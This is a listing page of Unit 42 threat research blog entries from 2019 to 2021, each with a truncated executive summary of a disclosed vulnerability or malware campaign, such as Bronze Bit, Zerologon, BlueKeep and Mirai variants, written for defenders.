Threat Brief: Kerberos KDC Security Feature Bypass Vulnerability (CVE-2020-17049 AKA Bronze Bit)
blogs_unit42·2021-03-03·CVSS 6.6
CVE-2020-17049 [MEDIUM] Threat Brief: Kerberos KDC Security Feature Bypass Vulnerability (CVE-2020-17049 AKA Bronze Bit)
Threat Research Center
High Profile Threats
Vulnerabilities
## Threat Brief: Kerberos KDC Security Feature Bypass Vulnerability (CVE-2020-17049 AKA Bronze Bit)
Aviad Meyer
Liav Zigelbaum
Published: March 3, 2021
High Profile Threats
Vulnerabilities
CVE-2020-17049
Kerberos
## Executive Summary
A recent vulnerability in the Kerberos authentication protocol, CVE-2020-17049 ( dubbed Bronze Bit ), has been disclosed by Microsoft. The vulnerability is in the way that the Key Distribution Center (KDC) handles service tickets and validates whether delegation is allowed.
In the attack, as detailed in the Palo Alto Networks Security Operations blog, “ Protecting Against the Bronze Bit Vulnerability with Cortex XDR ,” the attacker tampers with the Kerberos service ticket, which allow
Unit42
Threat Brief: Windows IPv4 and IPv6 Stack Vulnerabilities (CVE-2021-24074, CVE-2021-24086 and CVE-2021-24094)
blogs_unit42·2021-02-09·CVSS 9.8
CVE-2021-24074 [CRITICAL] Threat Brief: Windows IPv4 and IPv6 Stack Vulnerabilities (CVE-2021-24074, CVE-2021-24086 and CVE-2021-24094)
Threat Research Center
High Profile Threats
Vulnerabilities
## Threat Brief: Windows IPv4 and IPv6 Stack Vulnerabilities (CVE-2021-24074, CVE-2021-24086 and CVE-2021-24094)
Abisheik Ganesan
Published: February 9, 2021
High Profile Threats
Vulnerabilities
CVE-2021-24074
CVE-2021-24086
CVE-2021-24094
Microsoft
Windows
## Executive Summary
For Microsoft’s Patch Tuesday for February 2021, the company released patches for 56 disclosed vulnerabilities, which include:
CVE-2021-24086 and CVE-2021-24094 : Two denial-of-service (DoS) vulnerabilities in the Windows IPv6 stack.
CVE-2021-24074 : Remote code execution (RCE) vulnerability in the Windows IPv4 stack.
CVE-2021-24086 was given the Common Vulnerability Scoring System (CVSS) score of 7.5/6.5 and an "Important" security rat
Unit42
Exploits in the Wild for WordPress File Manager RCE Vulnerability (CVE-2020-25213)
blogs_unit42·2021-02-05·CVSS 5.4
CVE-2020-25213 [MEDIUM] Exploits in the Wild for WordPress File Manager RCE Vulnerability (CVE-2020-25213)
Threat Research Center
Threat Research
Vulnerabilities
## Exploits in the Wild for WordPress File Manager RCE Vulnerability (CVE-2020-25213)
Nadav Markus
Efi Barkayev
Gal De Leon
Published: February 5, 2021
Threat Research
Vulnerabilities
Cryptocurrency mining
Cryptojacking
CVE-2020-25213
Kinsing
Remote Code Execution
WordPress
## Executive Summary
In December 2020, Unit 42 researchers observed attempts to exploit CVE-2020-25213 , which is a file upload vulnerability in the WordPress File Manager plugin. Successful exploitation of this vulnerability allows an attacker to upload an arbitrary file with arbitrary names and extensions, leading to Remote Code Execution (RCE) on the targeted web server.
This exploit was used by attackers to install webshells, which in turn
Unit42
Network Attack Trends: Internet of Threats (August-October 2020)
blogs_unit42·2021-01-22·CVSS 9.8
CVE-2012-2311 [CRITICAL] Network Attack Trends: Internet of Threats (August-October 2020)
Threat Research Center
Trend Reports
Vulnerabilities
## Network Attack Trends: Internet of Threats (August-October 2020)
Yue Guan
Lei Xu
Ken Hsu
Zhibin Zhang
Published: January 22, 2021
Malware
Trend Reports
Vulnerabilities
DDoS
Exploits
IoT
Network security trends
## Executive Summary
Unit 42 researchers observed interesting attack trends from August-October 2020. Despite a surge in scanner activities and HTTP directory traversal exploitation attempts, CVE-2012-2311 and CVE-2012-1823 , which were the most commonly exploited vulnerabilities in the wild in early summer 2020 , are no longer at the top of that list. Several new critical exploits, including but not limited to CVE-2020-17496 and CVE-2020-25213 , have emerged and were being utilized at a constant and concern
Unit42
The History of DNS Vulnerabilities and the Cloud
blogs_unit42·2020-12-28
The History of DNS Vulnerabilities and the Cloud
Threat Research Center
Threat Research
Vulnerabilities
## The History of DNS Vulnerabilities and the Cloud
Daniel Prizmant
Published: December 28, 2020
Threat Research
Vulnerabilities
DNS cache poisoning
## Introduction
Every now and then, a new domain name system (DNS) vulnerability that puts billions of devices around the world at risk is discovered. DNS vulnerabilities are usually critical. Just imagine that you browse to your bank account website, but instead of returning the IP address of your bank website, your DNS resolver gives you the address of an attacker’s website. That website looks exactly the same as the bank’s website. Not only that, but even if you take a look at the URL bar, you won’t see anything wrong because your browser actually thinks this is the websit
Unit42
SolarStorm Supply Chain Attack Timeline
blogs_unit42·2020-12-23
SolarStorm Supply Chain Attack Timeline
Threat Research Center
High Profile Threats
Vulnerabilities
## SolarStorm Supply Chain Attack Timeline
Unit 42
Published: December 23, 2020
High Profile Threats
Malware
Vulnerabilities
Software supply-chain attack
SolarStorm
SolarWinds
SUPERNOVA
Supply-chain attack
## Executive Summary
On Dec. 13, the cyber community became aware of one of the most significant cybersecurity events of our time, impacting both commercial and government organizations around the world. The event was a supply chain attack on SolarWinds Orion Ⓡ software conducted by suspected nation-state operators that we are tracking as SolarStorm. Unit 42 was able to connect this event back to an attack we successfully prevented earlier this year. On Dec. 18, we launched a SolarStorm Rapid Assessment progra
Unit42
Protecting Against an Unfixed Kubernetes Man-in-the-Middle Vulnerability (CVE-2020-8554)
blogs_unit42·2020-12-21·CVSS 6.3
CVE-2020-8554 [MEDIUM] Protecting Against an Unfixed Kubernetes Man-in-the-Middle Vulnerability (CVE-2020-8554)
Threat Research Center
Threat Research
Cloud Cybersecurity Research
## Protecting Against an Unfixed Kubernetes Man-in-the-Middle Vulnerability (CVE-2020-8554)
Yuval Avrahami
Published: December 21, 2020
Cloud Cybersecurity Research
Threat Research
Vulnerabilities
CVE-2020-8554
Kubernetes
## Executive Summary
On Dec. 4, 2020, the Kubernetes Product Security Committee disclosed a new Kubernetes vulnerability assigned CVE-2020-8554. It is a medium severity issue affecting all Kubernetes versions and is currently unpatched . CVE-2020-8554 is a design flaw that allows Kubernetes Services to intercept cluster traffic to any IP address. Users who can manage services can exploit the vulnerability to carry out man-in-the-middle (MITM) attacks against pods and nodes in the cluster.
Unit42
Threat Brief: FireEye Red Team Tool Breach
blogs_unit42·2020-12-11
Threat Brief: FireEye Red Team Tool Breach
Threat Research Center
High Profile Threats
Vulnerabilities
## Threat Brief: FireEye Red Team Tool Breach
Unit 42
Published: December 10, 2020
High Profile Threats
Malware
Vulnerabilities
FireEye breach
## Executive Summary
On Dec. 8, 2020, one of the leading cybersecurity companies in the industry, FireEye, reported a breach and data exfiltration unlike any that we have seen previously. What makes this attack unique is not only the target, FireEye being a well-known cybersecurity company, but that the stolen data contains the internal, custom-crafted red-team and penetration testing tools used by the company to imitate different threat actors during customer security consultations. FireEye’s blog provided a wealth of information for defenders to implement security controls
Unit42
PGMiner: New Cryptocurrency Mining Botnet Delivered via PostgreSQL
blogs_unit42·2020-12-10·CVSS 7.2
[HIGH] PGMiner: New Cryptocurrency Mining Botnet Delivered via PostgreSQL
Threat Research Center
Threat Research
Malware
## PGMiner: New Cryptocurrency Mining Botnet Delivered via PostgreSQL
Xiao Zhang
Yang Ji
Jim Fitzgerald
Yue Chen
Claud Xiao
Published: December 10, 2020
Malware
Threat Research
Vulnerabilities
Cryptocurrency mining
Cryptojacking
Exploit
PostgreSQL
## Executive Summary
Cryptojacking (or simply malicious coin mining) is a common way for malware authors to monetize their operations. While the underlying mining protocols and techniques remain fairly standard, malware actors tend to seek out and find smarter ways to hack into a victim's machines. Recently, Unit 42 researchers uncovered a novel Linux-based cryptocurrency mining botnet that exploits a disputed PostgreSQL remote code execution (RCE) vulnerability that compromises
Unit42
Threat Brief: VMware Command Injection Vulnerability (CVE-2020-4006)
blogs_unit42·2020-12-10·CVSS 9.1
CVE-2020-4006 [CRITICAL] Threat Brief: VMware Command Injection Vulnerability (CVE-2020-4006)
Threat Research Center
High Profile Threats
Vulnerabilities
## Threat Brief: VMware Command Injection Vulnerability (CVE-2020-4006)
Shawn Westfall
Published: December 9, 2020
High Profile Threats
Vulnerabilities
CVE-2020-4006
VMware
## Executive Summary
On Dec. 7, 2020, the National Security Agency (NSA) published a cybersecurity advisory indicating they observed Russian state-sponsored actors exploiting a VMware command injection vulnerability (CVE-2020-4006). VMware issued a patch for the vulnerability on Dec. 3, 2020. The vulnerability affects the following VMware products:
VMware Access®3 20.01 and 20.10 on Linux®4
VMware vIDM®5 3.3.1, 3.3.2 and 3.3.3 on Linux
VMware vIDM Connector 3.3.1, 3.3.2, 3.3.3, 19.03
VMware Cloud Foundation®6 4.x
VMware vRealize Suite Lifecy
Unit42
Exploitation of Windows RDP Vulnerability CVE-2019-0708 (BlueKeep): Get RCE with System Privilege Using Refresh Rect PDU and RDPDR Client Name Request PDU
blogs_unit42·2020-12-07·CVSS 9.8
CVE-2019-0708 [CRITICAL] Exploitation of Windows RDP Vulnerability CVE-2019-0708 (BlueKeep): Get RCE with System Privilege Using Refresh Rect PDU and RDPDR Client Name Request PDU
Threat Research Center
Threat Research
Vulnerabilities
## Exploitation of Windows RDP Vulnerability CVE-2019-0708 (BlueKeep): Get RCE with System Privilege Using Refresh Rect PDU and RDPDR Client Name Request PDU
Tao Yan
Jin Chen
Published: December 7, 2020
Threat Research
Vulnerabilities
Bluekeep
CVE-2019-0708
RDP
Remote Code Execution
## Executive Summary
In May 2019, Microsoft released an out-of-band patch update for remote code execution (RCE) vulnerability CVE-2019-0708, which is also known as “BlueKeep” and resides in code for Remote Desktop Services (RDS). Over the last year, researchers had proved the exploitability of BlueKeep and proposed countermeasures to detect and prevent it. However, RDP is still one of the most popular attack vectors used by attackers toda
Unit42
Windows XP, Server 2003 Source Code Leak Leaves IoT, OT Devices Vulnerable
blogs_unit42·2020-11-06
Windows XP, Server 2003 Source Code Leak Leaves IoT, OT Devices Vulnerable
Threat Research Center
Threat Research
Vulnerabilities
## Windows XP, Server 2003 Source Code Leak Leaves IoT, OT Devices Vulnerable
Jun Du
Derick Liang
Aveek Das
Published: November 6, 2020
Threat Research
Vulnerabilities
IoT
Windows Server
Windows XP
## Executive Summary
On Sept. 24, 2020, the source code for Windows XP and Windows Server 2003 was leaked and posted on several file-sharing sites such as Mega and 4Chan. Microsoft ended support for Windows XP when it reached its end-of-support date in 2014 and for Windows Server 2003 in 2015. Therefore, any vulnerabilities discovered since then remain unaddressed (with the exception of a patch in 2017 for the WannaCry attack). Although the leaked Windows XP source code might have circulated privately even earlier, the rece
Unit42
Two New IoT Vulnerabilities Identified with Mirai Payloads
blogs_unit42·2020-10-14
Two New IoT Vulnerabilities Identified with Mirai Payloads
Threat Research Center
Threat Research
Vulnerabilities
## Two New IoT Vulnerabilities Identified with Mirai Payloads
Ken Hsu
Yue Guan
Vaibhav Singhal
Qi Deng
Published: October 14, 2020
Threat Research
Vulnerabilities
IoT
Mirai
## Executive Summary
Palo Alto Networks is proactively trying to safeguard its customers from attacks however possible. By leveraging its Next-Generation Firewall as sensors on the perimeter to detect malicious payloads and attack patterns, Unit 42 researchers are able to hunt down the menaces out there on the network, be they known or not.
Unit 42 researchers have taken a closer look at four Mirai variants from two recently discovered campaigns leveraging command injection vulnerability exploits that reveal a familiar IoT attack pattern.
While t
Unit42
Threat Brief: Microsoft Vulnerability CVE-2020-16898
blogs_unit42·2020-10-14·CVSS 8.8
CVE-2020-16898 [HIGH] Threat Brief: Microsoft Vulnerability CVE-2020-16898
Threat Research Center
High Profile Threats
Vulnerabilities
## Threat Brief: Microsoft Vulnerability CVE-2020-16898
Mike Harbison
Brandon Young
Published: October 14, 2020
High Profile Threats
Vulnerabilities
Bad Neighbor
CVE-2020-16898
Microsoft
## Executive Summary
In October 2020, during Microsoft’s Patch Tuesday, a security update ( CVE-2020-16898 ) addressed a critical vulnerability discovered in IPv6 Router Advertisement Options (called “DNS RA options”). This vulnerability resides within the Windows TCP/IP stack that is responsible for handling RA packets. Current exploitation leads to a Denial of Service (DoS) with the possibility of remote code execution.
This vulnerability affects multiple Windows versions that support IPv6 RDNSS, which was added to Windows star
Unit42
CVE-2020-14386: Privilege Escalation Vulnerability in the Linux kernel
blogs_unit42·2020-10-10·CVSS 7.8
CVE-2020-14386 [HIGH] CVE-2020-14386: Privilege Escalation Vulnerability in the Linux kernel
Threat Research Center
Threat Research
Vulnerabilities
## CVE-2020-14386: Privilege Escalation Vulnerability in the Linux kernel
Or Cohen
Published: October 9, 2020
Threat Research
Vulnerabilities
CVE-2020-14386
Linux
Privilege escalation
## Executive Summary
Lately, I’ve been investing time into auditing packet sockets source code in the Linux kernel. This led me to the discovery of CVE-2020-14386 , a memory corruption vulnerability in the Linux kernel. Such a vulnerability can be used to escalate privileges from an unprivileged user into the root user on a Linux system. In this blog, I will provide a technical walkthrough of the vulnerability, how it can be exploited and how Palo Alto Networks customers are protected.
A few years ago, several vulnerabilities were discove
Unit42
Unit 42 Discovers 27 New Vulnerabilities Across Microsoft Products
blogs_unit42·2020-10-02·CVSS 7.8
[HIGH] Unit 42 Discovers 27 New Vulnerabilities Across Microsoft Products
Threat Research Center
Threat Research
Vulnerabilities
## Unit 42 Discovers 27 New Vulnerabilities Across Microsoft Products
John Harrison
Published: October 2, 2020
Threat Research
Vulnerabilities
Microsoft
Microsoft Security Response Center
Microsoft Security Response Center (MSRC)
Privilege escalation
Remote Code Execution
## Overview
Palo Alto Networks Unit 42 threat researchers have been credited with discovering 27 new vulnerabilities addressed by the Microsoft Security Response Center (MSRC) , as part of its last nine months of security update releases.
## Vulnerabilities
The Microsoft vulnerabilities discovered included 27 vulnerabilities rated “important,” including Remote Code Execution, Privilege Elevation, Information Disclosure and one Denial of Service v
Unit42
Threat Brief: Microsoft Vulnerability CVE-2020-1472 “Zerologon”
blogs_unit42·2020-09-17·CVSS 5.5
CVE-2020-1472 [MEDIUM] Threat Brief: Microsoft Vulnerability CVE-2020-1472 “Zerologon”
Threat Research Center
High Profile Threats
Vulnerabilities
## Threat Brief: Microsoft Vulnerability CVE-2020-1472 “Zerologon”
Brandon Young
Mike Harbison
Published: September 17, 2020
High Profile Threats
Vulnerabilities
CVE-2020-1472
Zerologon
## Executive Summary
In August 2020, Microsoft released a security update, CVE-2020-1472 | Netlogon Elevation of Privilege Vulnerability , for a new elevation of privilege (EoP) vulnerability also known as "Zerologon." This vulnerability was given the highest Common Vulnerability Scoring System (CVSS) score of 10.0 and given a “critical” security rating from Microsoft.
This vulnerability exists within the Netlogon protocol . Exploitation of this vulnerability is possible due to a flaw in the implementation of the Netlogon protocol
Unit42
Network Attack Trends: Attackers Leveraging High Severity and Critical Exploits (May-July 2020)
blogs_unit42·2020-09-15·CVSS 9.8
CVE-2021-24074 [CRITICAL] Network Attack Trends: Attackers Leveraging High Severity and Critical Exploits (May-July 2020)
Threat Research Center
Trend Reports
Vulnerabilities
## Network Attack Trends: Attackers Leveraging High Severity and Critical Exploits (May-July 2020)
Brock Mammen
Yue Guan
Yu Fu
Published: September 15, 2020
Trend Reports
Vulnerabilities
CVE-2021-24074
CVE-2021-24086
CVE-2021-24094
Microsoft
Windows
## Executive Summary
From May 1-July 21, 2020, Unit 42 researchers captured global network traffic from firewalls around the world and then analyzed the data to examine the latest network attack trends. The majority of attacks we observed were classified as high severity (56.7%), and nearly one quarter (23%) were classified as critical. The most common vulnerabilities exploited were CVE-2012-2311 and CVE-2012-1823 , both command injection vulnerabilities in PHP CGI scripts
Unit42
Exploits in the Wild for vBulletin Pre-Auth RCE Vulnerability CVE-2020-17496
blogs_unit42·2020-09-03·CVSS 9.8
CVE-2020-17496 [CRITICAL] Exploits in the Wild for vBulletin Pre-Auth RCE Vulnerability CVE-2020-17496
Threat Research Center
Threat Research
Vulnerabilities
## Exploits in the Wild for vBulletin Pre-Auth RCE Vulnerability CVE-2020-17496
Haozhe Zhang
Qi Deng
Zhibin Zhang
Ruchna Nigam
Published: September 3, 2020
Threat Research
Vulnerabilities
CVE-2019-16759
CVE-2020-17496
Exploits
## Executive Summary
In September 2019, a remote code execution (RCE) vulnerability identified as CVE-2019-16759 was disclosed for vBulletin, a popular forum software. At that time, Unit 42 researchers published a blog on this vBulletin vulnerability , analyzing its root cause and the exploit we found in the wild. By exploiting this vulnerability, an attacker could have gained privileged access and control over any vBulletin server running versions 5.0.0 up to 5.5.4, and potentially lock organi
Unit42
The State of Exploit Development: 80% of Exploits Publish Faster than CVEs
blogs_unit42·2020-08-26
The State of Exploit Development: 80% of Exploits Publish Faster than CVEs
Threat Research Center
Threat Research
Vulnerabilities
## The State of Exploit Development: 80% of Exploits Publish Faster than CVEs
Jay Chen
Published: August 26, 2020
Threat Research
Vulnerabilities
Exploit
## Executive Summary
With the ever-increasing number of new vulnerabilities, vulnerability management becomes one of the most critical processes in ensuring continuous business operation. While it is clear that timely patching is essential, it’s also important to know quantitatively how a delay could increase risk. What is the chance that attackers breach my organization using a CVE just disclosed or using an unknown (zero-day) vulnerability? To understand the state of vulnerability disclosure and exploit development, Unit 42 researchers analyzed 45,450 publicly availabl
Unit42
Kubernetes Vulnerability Puts Clusters at Risk of Takeover (CVE-2020-8558)
blogs_unit42·2020-07-27·CVSS 5.4
CVE-2020-8558 [MEDIUM] Kubernetes Vulnerability Puts Clusters at Risk of Takeover (CVE-2020-8558)
Threat Research Center
Threat Research
Vulnerabilities
## Kubernetes Vulnerability Puts Clusters at Risk of Takeover (CVE-2020-8558)
Yuval Avrahami
Ariel Zelivansky
Published: July 27, 2020
Threat Research
Vulnerabilities
CVE-2020-8558
Kubernetes
## Executive Summary
A security issue assigned CVE-2020-8558 was recently discovered in the kube-proxy, a networking component running on Kubernetes nodes. The issue exposed internal services of Kubernetes nodes, often run without authentication. On certain Kubernetes deployments, this could have exposed the api-server, allowing an unauthenticated attacker to gain complete control over the cluster. An attacker with this sort of access could steal information, deploy crypto miners or remove existing services altogether.
The vulnera
Unit42
Threat Brief: Microsoft DNS Server Wormable Vulnerability CVE-2020-1350
blogs_unit42·2020-07-21·CVSS 10.0
CVE-2020-1350 [CRITICAL] Threat Brief: Microsoft DNS Server Wormable Vulnerability CVE-2020-1350
Threat Research Center
High Profile Threats
Vulnerabilities
## Threat Brief: Microsoft DNS Server Wormable Vulnerability CVE-2020-1350
Mike Harbison
Brandon Young
Published: July 21, 2020
High Profile Threats
Vulnerabilities
APAC
Defense
Education
EMEA
Finance
Government Health Care
High Tech
Retail
## Executive Summary
In July 2020, Microsoft released a security update, CVE-2020-1350 | Windows DNS Server Remote Code Execution Vulnerability , for a new remote code execution (RCE) vulnerability.
This vulnerability exists within the Microsoft Windows Domain Name System (DNS) Server due to the improper handling of certain types of requests, specifically over port 53/TCP. Exploitation of this vulnerability is possible by creating an integer overflow, potentially leading
Unit42
Lucifer: New Cryptojacking and DDoS Hybrid Malware Exploiting High and Critical Vulnerabilities to Infect Windows Devices
blogs_unit42·2020-06-24·CVSS 9.8
[CRITICAL] Lucifer: New Cryptojacking and DDoS Hybrid Malware Exploiting High and Critical Vulnerabilities to Infect Windows Devices
Threat Research Center
Threat Research
Vulnerabilities
## Lucifer: New Cryptojacking and DDoS Hybrid Malware Exploiting High and Critical Vulnerabilities to Infect Windows Devices
Ken Hsu
Durgesh Sangvikar
Zhibin Zhang
Chris Navarrete
Published: June 24, 2020
Threat Research
Vulnerabilities
Cryptocurrency mining
Cryptojacking
DDoS
Lucifer
## Executive Summary
On May 29, 2020, Unit 42 researchers discovered a new variant of a hybrid cryptojacking malware from numerous incidents of CVE-2019-9081 exploitation in the wild. A closer look revealed the malware, which we’ve dubbed “Lucifer”, is capable of conducting DDoS attacks and well-equipped with all kinds of exploits against vulnerable Windows hosts. The first wave of the campaign stopped on June 10, 2020. The attacker th
Unit42
AcidBox: Rare Malware Repurposing Turla Group Exploit Targeted Russian Organizations
blogs_unit42·2020-06-17·CVSS 8.8
CVE-2008-3431 [HIGH] AcidBox: Rare Malware Repurposing Turla Group Exploit Targeted Russian Organizations
Threat Research Center
Threat Research
Malware
## AcidBox: Rare Malware Repurposing Turla Group Exploit Targeted Russian Organizations
Dominik Reichel
Esmid Idrizovic
Published: June 17, 2020
Malware
Threat Research
Vulnerabilities
AcidBox
CVE-2008-3431
Pensive Ursa
Turla
## Executive Summary
When the news broke in 2014 about a new sophisticated threat actor dubbed the Turla Group , which the Estonian foreign intelligence service believes has Russian origins and operates on behalf of the FSB, its kernelmode malware also became the first publicly-described case that abused a third-party device driver to disable Driver Signature Enforcement (DSE). This security mechanism was introduced in Windows Vista to prevent unsigned drivers from loading into kernel space. Turla explo
Unit42
6 New Vulnerabilities Found on D-Link Home Routers
blogs_unit42·2020-06-12·CVSS 8.8
[HIGH] 6 New Vulnerabilities Found on D-Link Home Routers
Threat Research Center
Threat Research
Vulnerabilities
## 6 New Vulnerabilities Found on D-Link Home Routers
Gregory Basior
Published: June 12, 2020
Threat Research
Vulnerabilities
D-Link
IoT
Wireless routers
## Executive Summary
On February 28, 2020, Palo Alto Networks’ Unit 42 researchers discovered six new vulnerabilities in D-Link wireless cloud routers running their latest firmware.
The vulnerabilities were found in the DIR-865L model of D-Link routers, which is meant for home network use. The current trend towards working from home increases the likelihood of malicious attacks against home networks, which makes it even more imperative to keeping our networking devices updated.
It is possible that some of these vulnerabilities are also present in newer models of the
Unit42
Grandstream and DrayTek Devices Exploited to Power New Hoaxcalls DDoS Botnet
blogs_unit42·2020-04-03·CVSS 9.8
CVE-2020-5722 [CRITICAL] Grandstream and DrayTek Devices Exploited to Power New Hoaxcalls DDoS Botnet
Threat Research Center
Threat Research
Vulnerabilities
## Grandstream and DrayTek Devices Exploited to Power New Hoaxcalls DDoS Botnet
Ken Hsu
Haozhe Zhang
Zhibin Zhang
Ruchna Nigam
Published: April 3, 2020
Threat Research
Vulnerabilities
CVE-2020-5722
CVE-2020-8515
DDoS
Gafgyt
## Executive Summary
As soon as the proof-of-concept (PoC) for CVE-2020-8515 was made publicly available in March, this vulnerability was employed by a new DDoS botnet for propagation. Further analysis shows that this malware can also propagate by exploiting CVE-2020-5722 . As of now, the attack traffic detected has doubled since 03/31/2020, implying that many Grandstream UCM6200 and Draytek Vigor devices are infected or under active attack. We notified regional CERTs of potentially infected devi
Unit42
New Mirai Variant Targets Zyxel Network-Attached Storage Devices
blogs_unit42·2020-03-19·CVSS 9.8
CVE-2020-9054 [CRITICAL] New Mirai Variant Targets Zyxel Network-Attached Storage Devices
Threat Research Center
Threat Research
Malware
## New Mirai Variant Targets Zyxel Network-Attached Storage Devices
Ken Hsu
Zhibin Zhang
Ruchna Nigam
Published: March 19, 2020
Malware
Threat Research
Vulnerabilities
CVE-2020-9054
Mirai variant
## Executive Summary
As soon as the proof-of-concept (PoC) for CVE-2020-9054 was made publicly available last month, this vulnerability was promptly abused to infect vulnerable versions of Zyxel network-attached storage (NAS) devices with a new Mirai variant - Mukashi.
Mukashi brute forces the logins using different combinations of default credentials, while informing its command and control (C2) server of the successful login attempts. Multiple, if not all, Zyxel NAS products running firmware versions up to 5.21 are vulnerable to t
Unit42
Threat Brief: Microsoft SMBv3 Wormable Vulnerability CVE-2020-0796
blogs_unit42·2020-03-11·CVSS 10.0
CVE-2020-0796 [CRITICAL] Threat Brief: Microsoft SMBv3 Wormable Vulnerability CVE-2020-0796
Threat Research Center
High Profile Threats
Vulnerabilities
## Threat Brief: Microsoft SMBv3 Wormable Vulnerability CVE-2020-0796
Mike Harbison
Brandon Young
Published: March 11, 2020
High Profile Threats
Vulnerabilities
CVE-2020-0796
Remote Code Execution
## Executive Summary
In March 2020 Microsoft released a security advisory, ADV200005 | Microsoft Guidance for Disabling SMBv3 Compression , for a new remote code execution (RCE) vulnerability. Shortly after this advisory was released, Microsoft issued an out-of-band patch to protect affected users from CVE-2020-0796 . An out-of-band patch is typically released outside of the expected update period for a vendor. In this particular case, Microsoft is known to release updates on Patch Tuesday , which was two days prior to th
Unit42
2020 Unit 42 IoT Threat Report
blogs_unit42·2020-03-10
2020 Unit 42 IoT Threat Report
Threat Research Center
Trend Reports
Vulnerabilities
## 2020 Unit 42 IoT Threat Report
Unit 42
Published: March 10, 2020
Trend Reports
Vulnerabilities
IoT
Threat research
## Introduction
To understand the full scope of the current IoT threat landscape, we analyzed 1.2 million IoT devices in thousands of physical locations across enterprise IT and healthcare organizations in the United States in 2018 and 2019. Using the Palo Alto Networks’ IoT security product, Zingbox, we created the 2020 Unit 42 IoT Threat Report to identify the top IoT threats and provide recommendations that organizations can take to immediately reduce IoT risk in their environments.
Most notably, the report reveals that 83% of medical imaging devices are running on unsupported operating systems. This re
Unit42
Actors Still Exploiting SharePoint Vulnerability to Attack Middle East Government Organizations
blogs_unit42·2020-02-03·CVSS 9.8
CVE-2019-0604 [CRITICAL] Actors Still Exploiting SharePoint Vulnerability to Attack Middle East Government Organizations
Threat Research Center
Threat Research
Vulnerabilities
## Actors Still Exploiting SharePoint Vulnerability to Attack Middle East Government Organizations
Robert Falcone
Published: February 3, 2020
Threat Research
Vulnerabilities
China Chopper
CVE-2019-0604
Emissary Panda
Middle East
SharePoint
## Executive Summary
On September 10, 2019, we observed unknown threat actors exploiting a vulnerability in SharePoint described in CVE-2019-0604 to install several webshells on the website of a Middle East government organization. One of these webshells is the open source AntSword webshell freely available on Github , which is remarkably similar to the infamous China Chopper webshell.
On January 10, 2020, we used Shodan to search for Internet accessible servers running versions of
Unit42
Threat Brief: Windows CryptoAPI Spoofing Vulnerability CVE-2020-0601
blogs_unit42·2020-01-17·CVSS 8.1
CVE-2020-0601 [HIGH] Threat Brief: Windows CryptoAPI Spoofing Vulnerability CVE-2020-0601
Threat Research Center
High Profile Threats
Vulnerabilities
## Threat Brief: Windows CryptoAPI Spoofing Vulnerability CVE-2020-0601
Brandon Young
Mike Harbison
Published: January 17, 2020
High Profile Threats
Vulnerabilities
Curveball
CVE-2020-0601
Microsoft Vulnerability
## Executive Summary
In January 2020, during the first Patch Tuesday of the new year, Microsoft released patches for 17 new vulnerabilities including one for CVE-2020-0601 known as Curveball. The vulnerability exists in the Windows CryptoAPI (Crypt32.dll) and specifically relates to the method used for Elliptic Curve Cryptography (ECC) certificate validation. At the time of release, Microsoft affirmed that they had not yet seen the vulnerability exploited in the wild (ITW). Researcher Tal Be’ery released
Unit42
Exploits in the Wild for Citrix ADC and Citrix Gateway Directory Traversal Vulnerability CVE-2019-19781
blogs_unit42·2020-01-16·CVSS 9.8
CVE-2019-19781 [CRITICAL] Exploits in the Wild for Citrix ADC and Citrix Gateway Directory Traversal Vulnerability CVE-2019-19781
Threat Research Center
Threat Research
Vulnerabilities
## Exploits in the Wild for Citrix ADC and Citrix Gateway Directory Traversal Vulnerability CVE-2019-19781
Yue Guan
Qi Deng
Zhibin Zhang
Siddhart Shibiraj
Zhanhao Chen
Cecilia Hu
John Harrison
Published: January 16, 2020
Threat Research
Vulnerabilities
Citrix
CVE-2019-19781
Proof of Concept
Remote Code Execution
## Executive Summary
Just before the holidays, a vulnerability was identified in Citrix Application Delivery Controller (ADC) and Citrix Gateway which allowed remote attackers to easily send directory traversal requests, read sensitive information from system configuration files without the need for user authentication and remotely execute arbitrary code. This vulnerability affects all supported product v
Unit42
Unit 42 Discovers 13 New Vulnerabilities Across Microsoft and Adobe Products
blogs_unit42·2019-12-19·CVSS 7.5
[HIGH] Unit 42 Discovers 13 New Vulnerabilities Across Microsoft and Adobe Products
Threat Research Center
Threat Research
Vulnerabilities
## Unit 42 Discovers 13 New Vulnerabilities Across Microsoft and Adobe Products
John Harrison
Published: December 19, 2019
Threat Research
Vulnerabilities
Adobe
Microsoft
Zero-day
## Overview
Palo Alto Networks’ Unit 42 threat researchers have been credited with discovering six new vulnerabilities addressed by the Adobe Product Security Incident Response Team (PSIRT) as part of its December Adobe Security Bulletin APSB19-55 security updates. Additionally, seven new “important” rated vulnerabilities were addressed by the Microsoft Security Response Center (MSRC) as part of its September, October and November 2019 security update releases.
## Vulnerabilities
The Adobe vulnerabilities discovered included two “critical”
Unit42
Mirai Variant ECHOBOT Resurfaces with 13 Previously Unexploited Vulnerabilities
blogs_unit42·2019-12-13
Mirai Variant ECHOBOT Resurfaces with 13 Previously Unexploited Vulnerabilities
Threat Research Center
Threat Research
Malware
## Mirai Variant ECHOBOT Resurfaces with 13 Previously Unexploited Vulnerabilities
Ruchna Nigam
Published: December 13, 2019
Malware
Threat Research
Vulnerabilities
Echobot
IoT
IoT Vulnerability
Mirai
Mirai variant
## Executive Summary
Since the discovery of the Mirai variant using the binary name ECHOBOT in May 2019, it has resurfaced from time to time, using new infrastructure, and more remarkably, adding to the list of vulnerabilities it scans for, as a means to increase its attack surface with each evolution.
Unlike other Mirai variants, this particular variant stands out for the sheer number of exploits it incorporates, with the latest version having a total of 71 unique exploits, 13 of which haven’t been seen exploite
Unit42
Unit 42 Presents New Research at BlueHat Seattle on Three New Windows RDP Vulnerability Exploit Methods
blogs_unit42·2019-12-12·CVSS 9.8
[CRITICAL] Unit 42 Presents New Research at BlueHat Seattle on Three New Windows RDP Vulnerability Exploit Methods
Threat Research Center
Threat Research
Vulnerabilities
## Unit 42 Presents New Research at BlueHat Seattle on Three New Windows RDP Vulnerability Exploit Methods
John Harrison
Published: December 12, 2019
Threat Research
Vulnerabilities
BlueHat
BlueHat Seattle
Pool Fengshui
Vulnerability Exploitation
Windows RDP
## Overview
The Unit 42 threat intelligence team recently shared its latest findings at Microsoft’s invitation-only security conference, BlueHat Seattle 2019, on three new Windows Remote Desktop Protocol (RDP) vulnerability exploitation methods for Pool Feng Shui techniques. Pool Feng Shui is an advanced vulnerability exploitation technique that manipulates the kernel pool layout and state finely to facilitate arbitrary code execution.
The report, titled “Pool Fe
Unit42
What I Learned from Reverse Engineering Windows Containers
blogs_unit42·2019-12-12
What I Learned from Reverse Engineering Windows Containers
Threat Research Center
Learning Hub
Cloud Cybersecurity Research
